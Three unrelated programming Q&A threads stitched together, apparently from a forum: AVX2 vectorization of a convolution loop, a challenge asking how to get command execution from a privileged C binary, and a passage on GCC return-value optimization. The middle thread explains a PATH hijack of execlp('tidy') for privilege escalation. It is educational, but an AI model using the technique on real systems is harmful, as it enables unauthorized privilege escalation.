7a4c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
7a50: 8b 45 a8 mov eax,DWORD PTR [rbp-0x58]
7a53: 41 c7 00 00 00 00 00 mov DWORD PTR [r8],0x0
7a5a: 45 31 db xor r11d,r11d
7a5d: 48 8b 5d a0 mov rbx,QWORD PTR [rbp-0x60]
7a61: 44 8b 4d ac mov r9d,DWORD PTR [rbp-0x54]
7a65: 85 c0 test eax,eax
7a67: 0f 8e 98 00 00 00 jle 7b05 <convolution2D+0x285>
7a6d: 0f 1f 00 nop DWORD PTR [rax]
7a70: 45 85 c9 test r9d,r9d
7a73: 78 7b js 7af0 <convolution2D+0x270>
7a75: 45 39 ce cmp r14d,r9d
7a78: 7e 76 jle 7af0 <convolution2D+0x270>
7a7a: 48 8b 45 b8 mov rax,QWORD PTR [rbp-0x48]
7a7e: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30]
7a81: 48 89 de mov rsi,rbx
7a84: 4a 8d 3c 98 lea rdi,[rax+r11*4]
7a88: eb 13 jmp 7a9d <convolution2D+0x21d>
7a8a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
7a90: ff c2 inc edx
7a92: 4c 01 e7 add rdi,r12
7a95: 4c 01 e6 add rsi,r12
7a98: 44 39 d2 cmp edx,r10d
7a9b: 74 53 je 7af0 <convolution2D+0x270>
7a9d: 85 d2 test edx,edx
7a9f: 78 ef js 7a90 <convolution2D+0x210>
7aa1: 41 39 d6 cmp r14d,edx
7aa4: 7e ea jle 7a90 <convolution2D+0x210>
7aa6: 45 85 ed test r13d,r13d
7aa9: 7e e5 jle 7a90 <convolution2D+0x210>
7aab: c4 c1 7a 10 08 vmovss xmm1,DWORD PTR [r8]
7ab0: 31 c0 xor eax,eax
7ab2: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7abd: 0f 1f 00 nop DWORD PTR [rax]
7ac0: c5 fa 10 04 87 vmovss xmm0,DWORD PTR [rdi+rax*4]
7ac5: 48 89 c1 mov rcx,rax
7ac8: c5 fa 59 04 86 vmulss xmm0,xmm0,DWORD PTR [rsi+rax*4]
7acd: 48 ff c0 inc rax
7ad0: c5 f2 58 c8 vaddss xmm1,xmm1,xmm0
7ad4: c4 c1 7a 11 08 vmovss DWORD PTR [r8],xmm1
7ad9: 49 39 cf cmp r15,rcx
7adc: 75 e2 jne 7ac0 <convolution2D+0x240>
7ade: ff c2 inc edx
7ae0: 4c 01 e7 add rdi,r12
7ae3: 4c 01 e6 add rsi,r12
7ae6: 44 39 d2 cmp edx,r10d
7ae9: 75 b2 jne 7a9d <convolution2D+0x21d>
7aeb: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7af0: 4c 03 5d c8 add r11,QWORD PTR [rbp-0x38]
7af4: 48 03 5d c0 add rbx,QWORD PTR [rbp-0x40]
7af8: 41 ff c1 inc r9d
7afb: 44 3b 4d d4 cmp r9d,DWORD PTR [rbp-0x2c]
7aff: 0f 85 6b ff ff ff jne 7a70 <convolution2D+0x1f0>
7b05: 48 8b 5d 98 mov rbx,QWORD PTR [rbp-0x68]
7b09: 49 83 c0 04 add r8,0x4
7b0d: 48 01 5d b8 add QWORD PTR [rbp-0x48],rbx
7b11: 4c 3b 45 b0 cmp r8,QWORD PTR [rbp-0x50]
7b15: 0f 85 35 ff ff ff jne 7a50 <convolution2D+0x1d0>
7b1b: 8b 9d 74 ff ff ff mov ebx,DWORD PTR [rbp-0x8c]
7b21: 8b 45 94 mov eax,DWORD PTR [rbp-0x6c]
7b24: 48 8b 8d 48 ff ff ff mov rcx,QWORD PTR [rbp-0xb8]
7b2b: 01 5d d0 add DWORD PTR [rbp-0x30],ebx
7b2e: 48 01 4d b0 add QWORD PTR [rbp-0x50],rcx
7b32: 01 5d 84 add DWORD PTR [rbp-0x7c],ebx
7b35: 48 8b 8d 58 ff ff ff mov rcx,QWORD PTR [rbp-0xa8]
7b3c: 41 01 da add r10d,ebx
7b3f: 48 01 8d 78 ff ff ff add QWORD PTR [rbp-0x88],rcx
7b46: ff c0 inc eax
7b48: 39 85 38 ff ff ff cmp DWORD PTR [rbp-0xc8],eax
7b4e: 74 08 je 7b58 <convolution2D+0x2d8>
7b50: 89 45 94 mov DWORD PTR [rbp-0x6c],eax
7b53: e9 ac fe ff ff jmp 7a04 <convolution2D+0x184>
7b58: 8b 4d 90 mov ecx,DWORD PTR [rbp-0x70]
7b5b: 48 8b b5 30 ff ff ff mov rsi,QWORD PTR [rbp-0xd0]
7b62: 01 5d d4 add DWORD PTR [rbp-0x2c],ebx
7b65: 01 5d ac add DWORD PTR [rbp-0x54],ebx
7b68: 01 5d 80 add DWORD PTR [rbp-0x80],ebx
7b6b: 48 01 75 88 add QWORD PTR [rbp-0x78],rsi
7b6f: 8d 41 01 lea eax,[rcx+0x1]
7b72: 39 4d 94 cmp DWORD PTR [rbp-0x6c],ecx
7b75: 74 08 je 7b7f <convolution2D+0x2ff>
7b77: 89 45 90 mov DWORD PTR [rbp-0x70],eax
7b7a: e9 33 fe ff ff jmp 79b2 <convolution2D+0x132>
7b7f: 48 81 c4 b0 00 00 00 add rsp,0xb0
7b86: 5b pop rbx
7b87: 41 5c pop r12
7b89: 41 5d pop r13
7b8b: 41 5e pop r14
7b8d: 41 5f pop r15
7b8f: 5d pop rbp
7b90: c3 ret
7b91: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7b9c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
For reference, I'm using an AMD Ryzen 7 CPU which uses Zen2 architecture. Here is its list of instructions (page 101).
I suspect that the data here points to a memory issue instead of simply the multiplication being the cause of the bottleneck.
Question:
How can I improve this code so that it does not cause a memory bottleneck?
I'm guessing this is actually a problem particular to my code, perhaps something related to the multidimensional arrays I'm using. If I instead used one big single-dimentional array for each variable, would the latency decrease?
Relevant information:
There are two ways I declare the variables that are passed to this function. The first is as a global variable (usually in a struct), the second is as dynamic allocation:
float (*arr)[x][y] = calloc(z, sizeof *arr);
Perhaps the order in which I declare these matrixes is not cache-friendly, but I am not sure how to re-order it.
Stride values for the previous function are always 1 or 2, usually 1.
Here is the output of valgrind --tool=cachegrind:
==430300== Cachegrind, a cache and branch-prediction profiler
==430300== Copyright (C) 2002-2017, and GNU GPL'd, by Nicholas Nethercote et al.
==430300== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==430300== Command: ./EmbeddedNet test 1
==430300== Parent PID: 170008
==430300==
--430300-- warning: L3 cache found, using its data for the LL simulation.
==430300==
==430300== I refs: 6,369,594,192
==430300== I1 misses: 4,271
==430300== LLi misses: 2,442
==430300== I1 miss rate: 0.00%
==430300== LLi miss rate: 0.00%
==430300==
==430300== D refs: 2,064,233,110 (1,359,003,131 rd + 705,229,979 wr)
==430300== D1 misses: 34,476,969 ( 19,010,839 rd + 15,466,130 wr)
==430300== LLd misses: 5,311,277 ( 1,603,955 rd + 3,707,322 wr)
==430300== D1 miss rate: 1.7% ( 1.4% + 2.2% )
==430300== LLd miss rate: 0.3% ( 0.1% + 0.5% )
==430300==
==430300== LL refs: 34,481,240 ( 19,015,110 rd + 15,466,130 wr)
==430300== LL misses: 5,313,719 ( 1,606,397 rd + 3,707,322 wr)
==430300== LL miss rate: 0.1% ( 0.0% + 0.5% )
Looking at the result of Cachegrind, it doesn't look like the memory is your bottleneck. The NN has to be stored in memory anyway, but if it's too large that your program's having a lot of L1 cache misses, then it's worth thinking to try to minimize L1 misses, but 1.7% of L1 (data) miss rate is not a problem.
So you're trying to make this run fast anyway. Looking at your code, what's happening at the most inner loop is very simple (load-> multiply -> add -> store), and it doesn't have any side effect other than the final store. This kind of code is easily parallelizable, for example, by multithreading or vectorizing. I think you'll know how to make this run in multiple threads seeing that you can write code with some complexity, and you asked in comments how to manually vectorize the code.
I will explain that part, but one thing to bear in mind is that once you choose to manually vectorize the code, it will often be tied to certain CPU architectures. Let's not consider non-AMD64 compatible CPUs like ARM. Still, you have the option of MMX, SSE, AVX, and AVX512 to choose as an extension for vectorized computation, and each extension has multiple versions. If you want maximum portability, SSE2 is a reasonable choice. SSE2 appeared with Pentium 4, and it supports 128-bit vectors. For this post I'll use AVX2, which supports 128-bit and 256-bit vectors. It runs fine on your CPU, and has reasonable portability these days, supported from Haswell (2013) and Excavator (2015).
The pattern you're using in the inner loop is called FMA (fused multiply and add). AVX2 has an instruction for this. Have a look at this function and the compiled output.
float fma_scl(float a, float b, float c) {
return a * b + c;
}
fma_scl:
vfmadd132ss xmm0, xmm2, xmm1
ret
You can see the calculation done with a single instruction.
We'll define a 256-bit vector type using GCC's vector extension.
typedef float Vec __attribute__((vector_size(32), aligned(32)));
Here's a vectorized fma function.
Vec fma_vec(Vec a, Vec b, Vec c) {
return a * b + c;
}
fma_vec:
vfmadd132ps ymm0, ymm2, ymm1
ret
The code above is semantically the same as the one below, but everything is done in a single instruction.
typedef struct {
float f[8];
} Vec_;
Vec_ fma_vec_(Vec_ a, Vec_ b, Vec_ c) {
Vec_ r;
for (unsigned i = 0; i < 8; ++i) {
r.f[i] = a.f[i] * b.f[i] + c.f[i];
}
return r;
}
I think you'll now get the idea of making code run faster by vectorization.
Here is a simple function that's somewhat similar to your inner loop.
void loopadd_scl(float *restrict a, float *restrict b, float *restrict c, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
a[i] = fma_scl(b[i], c[i], a[i]);
}
}
When you compile through GCC with -O3 -march=znver2, this is the output. It's huge. I'll explain below.
loopadd_scl:
test ecx, ecx
je .L25
lea eax, [rcx-1]
cmp eax, 6
jbe .L13
mov r8d, ecx
xor eax, eax
shr r8d, 3
sal r8, 5
.L9:
vmovups ymm1, YMMWORD PTR [rdi+rax]
vmovups ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovups YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp r8, rax
jne .L9
mov eax, ecx
and eax, -8
test cl, 7
je .L26
vzeroupper
.L8:
mov r9d, ecx
sub r9d, eax
lea r8d, [r9-1]
cmp r8d, 2
jbe .L11
mov r8d, eax
sal r8, 2
lea r10, [rdi+r8]
vmovups xmm0, XMMWORD PTR [rdx+r8]
vmovups xmm2, XMMWORD PTR [r10]
vfmadd132ps xmm0, xmm2, XMMWORD PTR [rsi+r8]
mov r8d, r9d
and r8d, -4
add eax, r8d
and r9d, 3
vmovups XMMWORD PTR [r10], xmm0
je .L25
.L11:
mov r8d, eax
sal r8, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rdx+r8]
vmovss xmm3, DWORD PTR [r9]
vfmadd132ss xmm0, xmm3, DWORD PTR [rsi+r8]
lea r8d, [rax+1]
vmovss DWORD PTR [r9], xmm0
cmp r8d, ecx
jnb .L25
sal r8, 2
add eax, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rsi+r8]
vmovss xmm4, DWORD PTR [r9]
vfmadd132ss xmm0, xmm4, DWORD PTR [rdx+r8]
vmovss DWORD PTR [r9], xmm0
cmp eax, ecx
jnb .L25
sal rax, 2
add rdi, rax
vmovss xmm0, DWORD PTR [rdx+rax]
vmovss xmm5, DWORD PTR [rdi]
vfmadd132ss xmm0, xmm5, DWORD PTR [rsi+rax]
vmovss DWORD PTR [rdi], xmm0
.L25:
ret
.L26:
vzeroupper
ret
.L13:
xor eax, eax
jmp .L8
Basically GCC doesn't know anything about n, so it's splitting the loop to 3 cases: n / 8 > 1, n / 4 > 1, n < 4. It first deals with the n / 8 > 1 part using 256-bit ymm registers. Then, it deals with n / 4 > 1 with 128-bit xmm registers. Finally, it deals with n < 4 with scalar ss instructions.
You can avoid this mess if you know n is a multiple of 8. I got a bit lazy now, so have a look at the code and the compiler output below and compare it with the above. I think you're smart enough to get the idea.
void loopadd_vec(Vec *restrict a, Vec *restrict b, Vec *restrict c, unsigned n) {
n /= 8;
for (unsigned i = 0; i < n; ++i) {
a[i] = fma_vec(b[i], c[i], a[i]);
}
}
loopadd_vec:
shr ecx, 3
je .L34
mov ecx, ecx
xor eax, eax
sal rcx, 5
.L29:
vmovaps ymm1, YMMWORD PTR [rdi+rax]
vmovaps ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovaps YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp rcx, rax
jne .L29
vzeroupper
.L34:
ret
}

Is there a command execution vulnerability in this C program?

So I am working on a challenge problem to find a vulnerability in a C program binary that allows a command to be executed by the program (using the effective UID in Linux).
I am really struggling to find how to do this with this particular program.
The disassembly of the function in question (main function):
**************************************************************
* *
* FUNCTION *
**************************************************************
int __cdecl main(int argc, char * * argv)
int EAX:4 <RETURN>
int Stack[0x4]:4 argc
char * * Stack[0x8]:4 argv XREF[2]: 000109b0(R),
000109dd(R)
undefined4 Stack[-0x8]:4 local_8 XREF[1]: 00010bcb(R)
int Stack[-0xc]:4 in XREF[5]: 000109f0(W),
000109f3(R),
00010ad4(R),
00010b27(R),
00010b59(R)
int Stack[-0x10]:4 fd XREF[6]: 00010a1f(W),
00010a22(R),
00010aa5(R),
00010ab2(R),
00010ac9(R),
00010b4e(R)
pid_t Stack[-0x14]:4 pid XREF[4]: 00010a6b(W),
00010a6e(R),
00010a8b(R),
00010b6a(R)
int[2] Stack[-0x1c]:8 pipefd XREF[3,3]: 00010a3f(*),
00010a95(R),
00010b42(R),
00010abd(R),
00010b0f(R),
00010b36(R)
char Stack[-0x1d]:1 c XREF[2]: 00010b14(*),
00010b23(*)
int Stack[-0x24]:4 status XREF[2]: 00010b66(*),
00010b75(R)
main XREF[5]: Entry Point(*),
_start:00010866(*), 00010d30,
00010da0(*), 00011f34(*)
0001097d 55 PUSH EBP
0001097e 89 e5 MOV EBP,ESP
00010980 53 PUSH EBX
00010981 83 ec 1c SUB ESP,0x1c
00010984 e8 87 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010989 89 c3 MOV EBX,EAX
0001098b e8 80 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010990 53 PUSH EBX
00010991 50 PUSH EAX
00010992 e8 9d 16 CALL <EXTERNAL>::setreuid int setreuid(__uid_t __ruid, __u
00 00
00010997 83 c4 08 ADD ESP,0x8
0001099a e8 75 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
0001099f 89 c3 MOV EBX,EAX
000109a1 e8 6e 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
000109a6 53 PUSH EBX
000109a7 50 PUSH EAX
000109a8 e8 9b 16 CALL <EXTERNAL>::setregid int setregid(__gid_t __rgid, __g
00 00
000109ad 83 c4 08 ADD ESP,0x8
000109b0 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109b3 83 c0 04 ADD EAX,0x4
000109b6 8b 00 MOV EAX,dword ptr [EAX]
000109b8 85 c0 TEST EAX,EAX
000109ba 75 21 JNZ LAB_000109dd
000109bc a1 98 1f MOV EAX,[stderr]
01 00
000109c1 50 PUSH EAX
000109c2 6a 22 PUSH 0x22
000109c4 6a 01 PUSH 0x1
000109c6 68 50 0c PUSH s_Please_specify_the_file_to_verif_00010c50 = "Please specify the file to ve
01 00
000109cb e8 50 16 CALL <EXTERNAL>::fwrite size_t fwrite(void * __ptr, size
00 00
000109d0 83 c4 10 ADD ESP,0x10
000109d3 b8 01 00 MOV EAX,0x1
00 00
000109d8 e9 ee 01 JMP LAB_00010bcb
00 00
LAB_000109dd XREF[1]: 000109ba(j)
000109dd 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109e0 83 c0 04 ADD EAX,0x4
000109e3 8b 00 MOV EAX,dword ptr [EAX]
000109e5 6a 00 PUSH 0x0
000109e7 50 PUSH EAX
000109e8 e8 43 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
000109ed 83 c4 08 ADD ESP,0x8
000109f0 89 45 f8 MOV dword ptr [EBP + in],EAX
000109f3 83 7d f8 00 CMP dword ptr [EBP + in],0x0
000109f7 79 17 JNS LAB_00010a10
000109f9 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
000109fe e8 19 16 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a03 83 c4 04 ADD ESP,0x4
00010a06 b8 02 00 MOV EAX,0x2
00 00
00010a0b e9 bb 01 JMP LAB_00010bcb
00 00
LAB_00010a10 XREF[1]: 000109f7(j)
00010a10 6a 02 PUSH 0x2
00010a12 68 78 0c PUSH s_/dev/null_00010c78 = "/dev/null"
01 00
00010a17 e8 14 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
00010a1c 83 c4 08 ADD ESP,0x8
00010a1f 89 45 f4 MOV dword ptr [EBP + fd],EAX
00010a22 83 7d f4 00 CMP dword ptr [EBP + fd],0x0
00010a26 79 17 JNS LAB_00010a3f
00010a28 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
00010a2d e8 ea 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a32 83 c4 04 ADD ESP,0x4
00010a35 b8 05 00 MOV EAX,0x5
00 00
00010a3a e9 8c 01 JMP LAB_00010bcb
00 00
LAB_00010a3f XREF[1]: 00010a26(j)
00010a3f 8d 45 e8 LEA EAX=>pipefd,[EBP + -0x18]
00010a42 50 PUSH EAX
00010a43 e8 f8 15 CALL <EXTERNAL>::pipe int pipe(int * __pipedes)
00 00
00010a48 83 c4 04 ADD ESP,0x4
00010a4b 85 c0 TEST EAX,EAX
00010a4d 79 17 JNS LAB_00010a66
00010a4f 68 82 0c PUSH DAT_00010c82 = 70h p
01 00
00010a54 e8 c3 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a59 83 c4 04 ADD ESP,0x4
00010a5c b8 03 00 MOV EAX,0x3
00 00
00010a61 e9 65 01 JMP LAB_00010bcb
00 00
LAB_00010a66 XREF[1]: 00010a4d(j)
00010a66 e8 d9 15 CALL <EXTERNAL>::fork __pid_t fork(void)
00 00
00010a6b 89 45 f0 MOV dword ptr [EBP + pid],EAX
00010a6e 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a72 79 17 JNS LAB_00010a8b
00010a74 68 87 0c PUSH DAT_00010c87 = 66h f
01 00
00010a79 e8 9e 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a7e 83 c4 04 ADD ESP,0x4
00010a81 b8 04 00 MOV EAX,0x4
00 00
00010a86 e9 40 01 JMP LAB_00010bcb
00 00
LAB_00010a8b XREF[1]: 00010a72(j)
00010a8b 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a8f 0f 85 8c JNZ LAB_00010b21
00 00 00
00010a95 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010a98 6a 00 PUSH 0x0
00010a9a 50 PUSH EAX
00010a9b e8 60 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aa0 83 c4 08 ADD ESP,0x8
00010aa3 6a 01 PUSH 0x1
00010aa5 ff 75 f4 PUSH dword ptr [EBP + fd]
00010aa8 e8 53 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aad 83 c4 08 ADD ESP,0x8
00010ab0 6a 02 PUSH 0x2
00010ab2 ff 75 f4 PUSH dword ptr [EBP + fd]
00010ab5 e8 46 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aba 83 c4 08 ADD ESP,0x8
00010abd 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010ac0 50 PUSH EAX
00010ac1 e8 8a 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ac6 83 c4 04 ADD ESP,0x4
00010ac9 ff 75 f4 PUSH dword ptr [EBP + fd]
00010acc e8 7f 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ad1 83 c4 04 ADD ESP,0x4
00010ad4 ff 75 f8 PUSH dword ptr [EBP + in]
00010ad7 e8 74 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010adc 83 c4 04 ADD ESP,0x4
00010adf 6a 00 PUSH 0x0
00010ae1 68 8c 0c PUSH s_-asxml_00010c8c = "-asxml"
01 00
00010ae6 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010aeb 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010af0 e8 17 15 CALL <EXTERNAL>::execlp int execlp(char * __file, char *
00 00
00010af5 83 c4 10 ADD ESP,0x10
00010af8 68 98 0c PUSH s_execlp_00010c98 = "execlp"
01 00
00010afd e8 1a 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010b02 83 c4 04 ADD ESP,0x4
00010b05 b8 05 00 MOV EAX,0x5
00 00
00010b0a e9 bc 00 JMP LAB_00010bcb
00 00
LAB_00010b0f XREF[1]: 00010b34(j)
00010b0f 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b12 6a 01 PUSH 0x1
00010b14 8d 55 e7 LEA EDX=>c,[EBP + -0x19]
00010b17 52 PUSH EDX
00010b18 50 PUSH EAX
00010b19 e8 1e 15 CALL <EXTERNAL>::write ssize_t write(int __fd, void * _
00 00
00010b1e 83 c4 0c ADD ESP,0xc
LAB_00010b21 XREF[1]: 00010a8f(j)
00010b21 6a 01 PUSH 0x1
00010b23 8d 45 e7 LEA EAX=>c,[EBP + -0x19]
00010b26 50 PUSH EAX
00010b27 ff 75 f8 PUSH dword ptr [EBP + in]
00010b2a e8 d5 14 CALL <EXTERNAL>::read ssize_t read(int __fd, void * __
00 00
00010b2f 83 c4 0c ADD ESP,0xc
00010b32 85 c0 TEST EAX,EAX
00010b34 75 d9 JNZ LAB_00010b0f
00010b36 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b39 50 PUSH EAX
00010b3a e8 11 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b3f 83 c4 04 ADD ESP,0x4
00010b42 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010b45 50 PUSH EAX
00010b46 e8 05 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b4b 83 c4 04 ADD ESP,0x4
00010b4e ff 75 f4 PUSH dword ptr [EBP + fd]
00010b51 e8 fa 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b56 83 c4 04 ADD ESP,0x4
00010b59 ff 75 f8 PUSH dword ptr [EBP + in]
00010b5c e8 ef 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b61 83 c4 04 ADD ESP,0x4
00010b64 6a 00 PUSH 0x0
00010b66 8d 45 e0 LEA EAX=>status,[EBP + -0x20]
00010b69 50 PUSH EAX
00010b6a ff 75 f0 PUSH dword ptr [EBP + pid]
00010b6d e8 b2 14 CALL <EXTERNAL>::waitpid __pid_t waitpid(__pid_t __pid, i
00 00
00010b72 83 c4 0c ADD ESP,0xc
00010b75 8b 45 e0 MOV EAX,dword ptr [EBP + status]
00010b78 c1 f8 08 SAR EAX,0x8
00010b7b 0f b6 c0 MOVZX EAX,AL
00010b7e 83 f8 01 CMP EAX,0x1
00010b81 74 18 JZ LAB_00010b9b
00010b83 83 f8 02 CMP EAX,0x2
00010b86 74 22 JZ LAB_00010baa
00010b88 85 c0 TEST EAX,EAX
00010b8a 75 2d JNZ LAB_00010bb9
00010b8c 68 9f 0c PUSH DAT_00010c9f = 4Fh O
01 00
00010b91 e8 92 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010b96 83 c4 04 ADD ESP,0x4
00010b99 eb 2b JMP LAB_00010bc6
LAB_00010b9b XREF[1]: 00010b81(j)
00010b9b 68 a4 0c PUSH s_Your_file_is_not_completely_comp_00010ca4 = "Your file is not completely c
01 00
00010ba0 e8 83 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010ba5 83 c4 04 ADD ESP,0x4
00010ba8 eb 1c JMP LAB_00010bc6
LAB_00010baa XREF[1]: 00010b86(j)
00010baa 68 ca 0c PUSH s_Your_file_contains_errors_00010cca = "Your file contains errors"
01 00
00010baf e8 74 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bb4 83 c4 04 ADD ESP,0x4
00010bb7 eb 0d JMP LAB_00010bc6
LAB_00010bb9 XREF[1]: 00010b8a(j)
00010bb9 68 e4 0c PUSH s_I_can't_tell_if_your_file_is_XHT_00010ce4 = "I can't tell if your file is
01 00
00010bbe e8 65 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bc3 83 c4 04 ADD ESP,0x4
LAB_00010bc6 XREF[3]: 00010b99(j), 00010ba8(j),
00010bb7(j)
00010bc6 b8 00 00 MOV EAX,0x0
00 00
LAB_00010bcb XREF[6]: 000109d8(j), 00010a0b(j),
00010a3a(j), 00010a61(j),
00010a86(j), 00010b0a(j)
00010bcb 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
00010bce c9 LEAVE
00010bcf c3 RET
According to Ghidra, this decompiles to:
int main(int argc,char **argv)
{
__uid_t __euid;
__uid_t __ruid;
__gid_t __egid;
__gid_t __rgid;
int iVar1;
int __fd;
int iVar2;
__pid_t __pid;
ssize_t sVar3;
uint uVar4;
int status;
char c;
int pipefd [2];
pid_t pid;
int fd;
int in;
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
__egid = getegid();
__rgid = getegid();
setregid(__rgid,__egid);
if (argv[1] == (char *)0x0) {
fwrite("Please specify the file to verify\n",1,0x22,stderr);
iVar1 = 1;
}
else {
iVar1 = open(argv[1],0);
if (iVar1 < 0) {
perror("open");
iVar1 = 2;
}
else {
__fd = open("/dev/null",2);
if (__fd < 0) {
perror("open");
iVar1 = 5;
}
else {
iVar2 = pipe(pipefd);
if (iVar2 < 0) {
perror("pipe");
iVar1 = 3;
}
else {
__pid = fork();
if (__pid < 0) {
perror("fork");
iVar1 = 4;
}
else if (__pid == 0) {
dup2(pipefd[0],0);
dup2(__fd,1);
dup2(__fd,2);
close(pipefd[1]);
close(__fd);
close(iVar1);
execlp("tidy","tidy","-asxml",0);
perror("execlp");
iVar1 = 5;
}
else {
while( true ) {
sVar3 = read(iVar1,&c,1);
if (sVar3 == 0) break;
write(pipefd[1],&c,1);
}
close(pipefd[1]);
close(pipefd[0]);
close(__fd);
close(iVar1);
waitpid(__pid,&status,0);
uVar4 = status >> 8 & 0xff;
if (uVar4 == 1) {
puts("Your file is not completely compliant");
}
else if (uVar4 == 2) {
puts("Your file contains errors");
}
else if (uVar4 == 0) {
puts("OK!");
}
else {
puts("I can\'t tell if your file is XHTML-compliant");
}
iVar1 = 0;
}
}
}
}
}
return iVar1;
}
It appears it is (to summarize) opening the file passed as the first argument using open in read only mode. If successful, it is forking and using the child process to execute tidy to validate the file is valid XHTML.
Nothing about it stands out to me as an obvious vulnerability that I can use here. I've looked into vulnerabilities for the tidy command, but wasn't really able to find anything useful for this.
Any help would be much appreciated!
In regular C code, execlp("tidy","tidy","-asxml",0); is incorrect as execlp() expects a null pointer argument to mark the end of the argument list.
0 is a null pointer when used in a pointer context, which this is not. Yet on architectures where pointers have the same size and passing convention as int, such as 32-bit linux, passing 0 or passing NULL generate the same code, so sloppiness does not get punished.
In 64-bit mode, it would be incorrect to do so but you might get lucky with the x86_64 ABI and a 64-bit 0 value will be passed in this case.
In your own code, avoid such pitfalls and use NULL or (char *)0 as the last argument for execlp(). But on this listing, Ghidra produces code that generates the same assembly code, and in 32-bit mode, passing 0 or (char *)0 produce the same code, so no problem here.
In your context, execlp("tidy","tidy","-asxml",0); shows another problem: it will look for an executable program with the name tidy in the current PATH and run this program as tidy with a command line argument -asxml. Since it changed the effective uid and gid, this is a problem if the program is setuid root because you can create a program named tidy in a directory appearing in the PATH variable before the system directories and this program will be run with the modified rights.
Another potential problem is the program does not check for failure of the system calls setreuid() and setregid(). Although these calls are unlikely to fail for the arguments passed, as documented in the manual pages, it is a grave security error to omit checking for a failure return from setreuid(). In case of failure, the real and effective uid (or gid) is not changed and the process may fork and exec with root privileges.

Disable named return value optimization in gcc for pure C

I failed to find a flag that controls the named return value optimization for C language. For C++ it seems to be -fno-elide-constructors.
The source code implementing it is here but since it is a middle-end, no front end information is spoiled even in comments. The manual section did not exactly help either. However disassembling shows that as it is turned off on O0 and enabled on O1 it must be one of the following:
-fauto-inc-dec
-fcprop-registers
-fdce
-fdefer-pop
-fdelayed-branch
-fdse
-fguess-branch-probability
-fif-conversion2
-fif-conversion
-finline-small-functions
-fipa-pure-const
-fipa-reference
-fmerge-constants
-fsplit-wide-types
-ftree-builtin-call-dce
-ftree-ccp
-ftree-ch
-ftree-copyrename
-ftree-dce
-ftree-dominator-opts
-ftree-dse
-ftree-fre
-ftree-sra
-ftree-ter
-funit-at-a-time
C code:
struct p {
long x;
long y;
long z;
};
__attribute__((noinline))
struct p f(void) {
struct p copy;
copy.x = 1;
copy.y = 2;
copy.z = 3;
return copy;
}
int main(int argc, char** argv) {
volatile struct p inst = f();
return 0;
}
Compiled with O0 we see that the 'copy' structure is naively allocated on stack:
00000000004004b6 <f>:
4004b6: 55 push rbp
4004b7: 48 89 e5 mov rbp,rsp
4004ba: 48 89 7d d8 mov QWORD PTR [rbp-0x28],rdi
4004be: 48 c7 45 e0 01 00 00 mov QWORD PTR [rbp-0x20],0x1
4004c5: 00
4004c6: 48 c7 45 e8 02 00 00 mov QWORD PTR [rbp-0x18],0x2
4004cd: 00
4004ce: 48 c7 45 f0 03 00 00 mov QWORD PTR [rbp-0x10],0x3
4004d5: 00
4004d6: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004da: 48 8b 55 e0 mov rdx,QWORD PTR [rbp-0x20]
